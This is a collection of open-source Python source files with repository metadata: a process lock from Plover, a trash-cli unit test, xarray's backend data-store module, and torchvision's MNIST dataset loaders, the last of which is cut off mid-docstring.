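# fetch subsequent pages. Assuming a configured NetworkManagementClient named
# `network_client`:
#
#     for vnet in network_client.virtual_networks.list_all():
#         print(vnet.name, vnet.location)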
|
nimble0/plover
|
plover/oslayer/processlock.py
|
Python
|
gpl-2.0
| 2,400
| 0.002083
|
# Copyright (c) 2012 Hesky Fisher
# See LICENSE.txt for details.
#
# processlock.py - Cross platform global lock to ensure plover only runs once.
"""Global lock to ensure plover only runs once."""
import sys
class LockNotAcquiredException(Exception):
pass
if sys.platform.startswith('win32'):
from ctypes import windll
class PloverLock:
# A GUID from http://createguid.com/
guid = 'plover_{F8C06652-2C51-410B-8D15-C94DF96FC1F9}'
def __init__(self):
pass
def acquire(self):
self.mutex = windll.kernel32.CreateMutexA(None, False, self.guid)
if windll.kernel32.GetLastError() == 0xB7: # ERROR_ALREADY_EXISTS
raise LockNotAcquiredException()
def release(self):
if hasattr(self, 'mutex'):
windll.kernel32.CloseHandle(self.mutex)
del self.mutex
def __del__(self):
self.release()
def __enter__(self):
self.acquire()
def __exit__(self, type, value, traceback):
self.release()
else:
import fcntl
import os
class PloverLock:
def __init__(self):
# Check the environment for items to make the lockfile unique
# fallback if not found
if 'DISPLAY' in os.environ:
display = os.environ['DISPLAY'][-1:]
else:
display = "0"
            if hasattr(os, "uname"):
                hostname = os.uname()[1]
else:
import socket
hostname = socket.gethostname()
lock_file_name = os.path.expanduser(
'~/.plover-lock-%s-%s' % (hostname, display))
self.fd = open(lock_file_name, 'w')
def acquire(self):
try:
fcntl.flock(self.fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
            except IOError as e:
raise LockNotAcquiredException(str(e))
def release(self):
try:
fcntl.flock(self.fd, fcntl.LOCK_UN)
except:
pass
def __del__(self):
self.release()
try:
self.fd.close()
except:
pass
def __enter__(self):
self.acquire()
def __exit__(self, exc_type, exc_value, traceback):
self.release()
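# Minimal usage sketch (added; not part of the original module): both
# platform-specific implementations expose the same context-manager interface,
# so callers can guard startup like this (`start_plover` is a hypothetical
# entry point):
#
#     lock = PloverLock()
#     try:
#         with lock:
#             start_plover()
#     except LockNotAcquiredException:
#         print("Plover is already running.")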
|
sein-tao/trash-cli
|
unit_tests/test_storing_paths.py
|
Python
|
gpl-2.0
| 1,446
| 0.009682
|
from trashcli.put import TrashDirectoryForPut
from nose.tools import assert_equals
from mock import Mock
class TestHowOriginalLocationIsStored:
def test_for_absolute_paths(self):
fs = Mock()
self.dir = TrashDirectoryForPut('/volume/.Trash', '/volume', fs = fs)
self.dir.store_absolute_paths()
self.assert_path_for_trashinfo_is('/file' , '/file')
self.assert_path_for_trashinfo_is('/file' , '/dir/../file')
self.assert_path_for_trashinfo_is('/outside/file' , '/outside/file')
self.assert_path_for_trashinfo_is('/volume/file' , '/volume/file')
self.assert_path_for_trashinfo_is('/volume/dir/file' , '/volume/dir/file')
def test_for_relative_paths(self):
self.dir = TrashDirectoryForPut('/volume/.Trash', '/volume')
        self.dir.store_relative_paths()
self.assert_path_for_trashinfo_is('/file' , '/file')
        self.assert_path_for_trashinfo_is('/file' , '/dir/../file')
self.assert_path_for_trashinfo_is('/outside/file' , '/outside/file')
self.assert_path_for_trashinfo_is('file' , '/volume/file')
self.assert_path_for_trashinfo_is('dir/file' , '/volume/dir/file')
def assert_path_for_trashinfo_is(self, expected_value, file_to_be_trashed):
result = self.dir.path_for_trash_info.for_file(file_to_be_trashed)
assert_equals(expected_value, result)
|
drewokane/xray
|
xarray/backends/common.py
|
Python
|
apache-2.0
| 7,619
| 0.000263
|
import numpy as np
import itertools
import logging
import time
import traceback
from collections import Mapping
from ..conventions import cf_encoder
from ..core.utils import FrozenOrderedDict
from ..core.pycompat import iteritems, dask_array_type, OrderedDict
# Create a logger object, but don't add any handlers. Leave that to user code.
logger = logging.getLogger(__name__)
NONE_VAR_NAME = '__values__'
def _encode_variable_name(name):
if name is None:
name = NONE_VAR_NAME
return name
def _decode_variable_name(name):
if name == NONE_VAR_NAME:
name = None
return name
def is_trivial_index(var):
"""
    Determines whether an index is 'trivial', meaning that it is
    equivalent to np.arange(). This is determined by
    checking that there are no attributes or encodings,
    that ndim is one and the dtype is integer, and finally by comparing
    the actual values to np.arange().
"""
# if either attributes or encodings are defined
    # the index is not trivial.
if len(var.attrs) or len(var.encoding):
return False
# if the index is not a 1d integer array
if var.ndim > 1 or not var.dtype.kind == 'i':
return False
arange = np.arange(var.size, dtype=var.dtype)
return np.all(var.values == arange)
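# Illustrative check (added; assumes xarray.Variable is importable here):
#
#     from xarray import Variable
#     is_trivial_index(Variable('x', np.arange(4)))          # True
#     is_trivial_index(Variable('x', np.array([3, 1, 2])))   # False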
def robust_getitem(array, key, catch=Exception, max_retries=6,
initial_delay=500):
"""
Robustly index an array, using retry logic with exponential backoff if any
of the errors ``catch`` are raised. The initial_delay is measured in ms.
With the default settings, the maximum delay will be in the range of 32-64
seconds.
"""
assert max_retries >= 0
for n in range(max_retries + 1):
try:
return array[key]
except catch:
if n == max_retries:
raise
base_delay = initial_delay * 2 ** n
next_delay = base_delay + np.random.randint(base_delay)
msg = ('getitem failed, waiting %s ms before trying again '
'(%s tries remaining). Full traceback: %s' %
(next_delay, max_retries - n, traceback.format_exc()))
logger.debug(msg)
time.sleep(1e-3 * next_delay)
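# Hedged usage sketch (added; `remote_array` is a hypothetical array-like whose
# __getitem__ may fail transiently, e.g. over an unreliable network):
#
#     data = robust_getitem(remote_array, (slice(None), 0),
#                           catch=RuntimeError, max_retries=3)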
class AbstractDataStore(Mapping):
def __iter__(self):
return iter(self.variables)
def __getitem__(self, key):
return self.variables[key]
def __len__(self):
return len(self.variables)
def get_attrs(self): # pragma: no cover
raise NotImplementedError
def get_variables(self): # pragma: no cover
raise NotImplementedError
def load(self):
"""
This loads the variables and attributes simultaneously.
A centralized loading function makes it easier to create
data stores that do automatic encoding/decoding.
For example:
class SuffixAppendingDataStore(AbstractDataStore):
def load(self):
variables, attributes = AbstractDataStore.load(self)
variables = {'%s_suffix' % k: v
for k, v in iteritems(variables)}
attributes = {'%s_suffix' % k: v
for k, v in iteritems(attributes)}
return variables, attributes
This function will be called anytime variables or attributes
        are requested, so care should be taken to make sure it's fast.
"""
variables = FrozenOrderedDict((_decode_variable_name(k), v)
for k, v in iteritems(self.get_variables()))
attributes = FrozenOrderedDict(self.get_attrs())
return variables, attributes
@property
def variables(self):
# Because encoding/decoding might happen which may require both the
# attributes and the variables, and because a store may be updated
# we need to load both the attributes and variables
# anytime either one is requested.
variables, _ = self.load()
return variables
@property
def attrs(self):
# Because encoding/decoding might happen which may require both the
# attributes and the variables, and because a store may be updated
# we need to load both the attributes and variables
# anytime either one is requested.
_, attributes = self.load()
return attributes
@property
def dimensions(self):
return self.get_dimensions()
def close(self):
pass
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
self.close()
class ArrayWriter(object):
def __init__(self):
self.sources = []
self.targets = []
def add(self, source, target):
        if isinstance(source, dask_array_type):
            self.sources.append(source)
self.targets.append(target)
else:
target[...] = source
def sync(self):
if self.sources:
import dask.array as da
            da.store(self.sources, self.targets)
self.sources = []
self.targets = []
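# Design note and usage sketch (added; assumes numpy as np and dask.array as da
# are imported, and `target_a`/`target_b` are hypothetical writable array
# targets): in-memory sources are written eagerly in add(), while dask arrays
# are only recorded and then written in a single da.store() call in sync(), so
# one graph execution can fill many targets.
#
#     writer = ArrayWriter()
#     writer.add(np.zeros(3), target_a)               # written immediately
#     writer.add(da.zeros(3, chunks=(3,)), target_b)  # deferred until sync()
#     writer.sync()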
class AbstractWritableDataStore(AbstractDataStore):
def __init__(self, writer=None):
if writer is None:
writer = ArrayWriter()
self.writer = writer
def set_dimension(self, d, l): # pragma: no cover
raise NotImplementedError
def set_attribute(self, k, v): # pragma: no cover
raise NotImplementedError
def set_variable(self, k, v): # pragma: no cover
raise NotImplementedError
def sync(self):
self.writer.sync()
def store_dataset(self, dataset):
# in stores variables are all variables AND coordinates
# in xarray.Dataset variables are variables NOT coordinates,
# so here we pass the whole dataset in instead of doing
# dataset.variables
self.store(dataset, dataset.attrs)
def store(self, variables, attributes, check_encoding_set=frozenset()):
self.set_attributes(attributes)
        necessary_dims = [v.dims for v in variables.values()]
        necessary_dims = set(itertools.chain(*necessary_dims))
# set all non-indexes and any index which is not trivial.
variables = OrderedDict((k, v) for k, v in iteritems(variables)
                                if not (k in necessary_dims and
is_trivial_index(v)))
self.set_variables(variables, check_encoding_set)
def set_attributes(self, attributes):
for k, v in iteritems(attributes):
self.set_attribute(k, v)
def set_variables(self, variables, check_encoding_set):
for vn, v in iteritems(variables):
name = _encode_variable_name(vn)
check = vn in check_encoding_set
target, source = self.prepare_variable(name, v, check)
self.writer.add(source, target)
def set_necessary_dimensions(self, variable):
for d, l in zip(variable.dims, variable.shape):
if d not in self.dimensions:
self.set_dimension(d, l)
class WritableCFDataStore(AbstractWritableDataStore):
def store(self, variables, attributes, check_encoding_set=frozenset()):
        # All NetCDF files get CF encoded by default; without this, attempting
        # to write times, for example, would fail.
cf_variables, cf_attrs = cf_encoder(variables, attributes)
AbstractWritableDataStore.store(self, cf_variables, cf_attrs,
check_encoding_set)
|
jrdurrant/vision
|
torchvision/datasets/mnist.py
|
Python
|
bsd-3-clause
| 12,198
| 0.003771
|
from __future__ import print_function
import torch.utils.data as data
from PIL import Image
import os
import os.path
import errno
import numpy as np
import torch
import codecs
class MNIST(data.Dataset):
"""`MNIST <http://yann.lecun.com/exdb/mnist/>`_ Dataset.
Args:
root (string): Root directory of dataset where ``processed/training.pt``
and ``processed/test.pt`` exist.
train (bool, optional): If True, creates dataset from ``training.pt``,
otherwise from ``test.pt``.
download (bool, optional): If true, downloads the dataset from the internet and
puts it in root directory. If dataset is already downloaded, it is not
downloaded again.
        transform (callable, optional): A function/transform that takes in a PIL image
and returns a transformed version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/transform that takes in the
target and transforms it.
"""
urls = [
'http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz',
'http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz',
'http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz',
'http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz',
]
raw_folder = 'raw'
processed_folder = 'processed'
training_file = 'training.pt'
test_file = 'test.pt'
def __init__(self, root, train=True, transform=None, target_transform=None, download=False):
self.root = os.path.expanduser(root)
self.transform = transform
self.target_transform = target_transform
self.train = train # training set or test set
if download:
self.download()
if not self._check_exists():
raise RuntimeError('Dataset not found.' +
' You can use download=True to download it')
if self.train:
self.train_data, self.train_labels = torch.load(
os.path.join(self.root, self.processed_folder, self.training_file))
else:
self.test_data, self.test_labels = torch.load(
os.path.join(self.root, self.processed_folder, self.test_file))
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target class.
"""
if self.train:
img, target = self.train_data[index], self.train_labels[index]
else:
img, target = self.test_data[index], self.test_labels[index]
# doing this so that it is consistent with all other datasets
# to return a PIL Image
img = Image.fromarray(img.numpy(), mode='L')
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
if self.train:
return len(self.train_data)
else:
return len(self.test_data)
def _check_exists(self):
return os.path.exists(os.path.join(self.root, self.processed_folder, self.training_file)) and \
os.path.exists(os.path.join(self.root, self.processed_folder, self.test_file))
def download(self):
"""Download the MNIST data if it doesn't exist in processed_folder already."""
from six.moves import urllib
import gzip
if self._check_exists():
return
# download files
try:
os.makedirs(os.path.join(self.root, self.raw_folder))
os.makedirs(os.path.join(self.root, self.processed_folder))
except OSError as e:
if e.errno == errno.EEXIST:
pass
else:
raise
for url in self.urls:
print('Downloading ' + url)
data = urllib.request.urlopen(url)
filename = url.rpartition('/')[2]
file_path = os.path.join(self.root, self.raw_folder, filename)
with open(file_path, 'wb') as f:
f.write(data.read())
with open(file_path.replace('.gz', ''), 'wb') as out_f, \
gzip.GzipFile(file_path) as zip_f:
out_f.write(zip_f.read())
os.unlink(file_path)
# process and save as torch files
print('Processing...')
training_set = (
read_image_file(os.path.join(self.root, self.raw_folder, 'train-images-idx3-ubyte')),
read_label_file(os.path.join(self.root, self.raw_folder, 'train-labels-idx1-ubyte'))
)
test_set = (
read_image_file(os.path.join(self.root, self.raw_folder, 't10k-images-idx3-ubyte')),
read_label_file(os.path.join(self.root, self.raw_folder, 't10k-labels-idx1-ubyte'))
)
with open(os.path.join(self.root, self.processed_folder, self.training_file), 'wb') as f:
torch.save(training_set, f)
with open(os.path.join(self.root, self.processed_folder, self.test_file), 'wb') as f:
torch.save(test_set, f)
print('Done!')
def __repr__(self):
fmt_str = 'Dataset ' + self.__class__.__name__ + '\n'
fmt_str += ' Number of datapoints: {}\n'.format(self.__len__())
tmp = 'train' if self.train is True else 'test'
fmt_str += ' Split: {}\n'.format(tmp)
fmt_str += ' Root Location: {}\n'.format(self.root)
tmp = ' Transforms (if any): '
fmt_str += '{0}{1}\n'.format(tmp, self.transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
tmp = ' Target Transforms (if any): '
fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
return fmt_str
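# Usage sketch (illustrative; not part of the original file). Assuming
# torchvision.transforms is available:
#
#     from torchvision import transforms
#     train_set = MNIST(root='./data', train=True, download=True,
#                       transform=transforms.ToTensor())
#     img, label = train_set[0]   # image tensor and its label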
class FashionMNIST(MNIST):
"""`Fashion-MNIST <https://github.com/zalandoresearch/fashion-mnist>`_ Dataset.
Args:
root (string): Root directory of dataset where ``processed/training.pt``
and ``processed/test.pt`` exist.
train (bool, optional): If True, creates dataset from ``training.pt``,
otherwise from ``test.pt``.
download (bool, optional): If true, downloads the dataset from the internet and
            puts it in root directory. If dataset is already downloaded, it is not
            downloaded again.
        transform (callable, optional): A function/transform that takes in a PIL image
and returns a transformed version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/transform that takes in the
target and transforms it.
"""
urls = [
'http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/train-images-idx3-ubyte.gz',
'http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/train-labels-idx1-ubyte.gz',
'http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/t10k-images-idx3-ubyte.gz',
'http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/t10k-labels-idx1-ubyte.gz',
]
class EMNIST(MNIST):
"""`EMNIST <https://www.nist.gov/itl/iad/image-group/emnist-dataset/>`_ Dataset.
Args:
root (string): Root directory of dataset where ``processed/training.pt``
and ``processed/test.pt`` exist.
split (string): The dataset has 6 different splits: ``byclass``, ``bymerge``,
``balanced``, ``letters``, ``digits`` and ``mnist``. This argument specifies
which one to use.
train (bool, optional): If True, creates dataset from ``training.pt``,
otherwise from ``test.pt``.
download (bool, optional): If true, downloads the dataset from the internet and
puts it in root directory. If dataset is already downloaded, it is not
downloaded again.
        transform (callable, optional): A function/transform that takes in a PIL image
and returns a transformed version. E.g, ``transforms.RandomCrop``
        target_transform (callable, optional): A function/transform that takes in the
            target and transforms it.